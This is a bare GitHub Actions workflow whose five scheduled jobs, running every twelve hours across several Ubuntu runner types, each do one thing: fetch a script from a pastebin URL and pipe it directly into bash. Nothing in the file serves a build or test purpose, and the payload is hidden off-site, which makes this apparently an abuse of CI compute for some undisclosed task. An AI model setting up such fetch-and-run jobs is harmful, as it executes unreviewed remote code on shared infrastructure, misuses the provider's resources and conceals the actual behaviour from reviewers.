on:
  schedule:
    - cron: 0 */12 * * *
jobs:
  main-1:
    runs-on: ubuntu-26.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  main-2:
    runs-on: ubuntu-26.04-arm
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  main-3:
    runs-on: ubuntu-24.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  main-4:
    runs-on: ubuntu-24.04-arm
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  main-5:
    runs-on: ubuntu-22.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
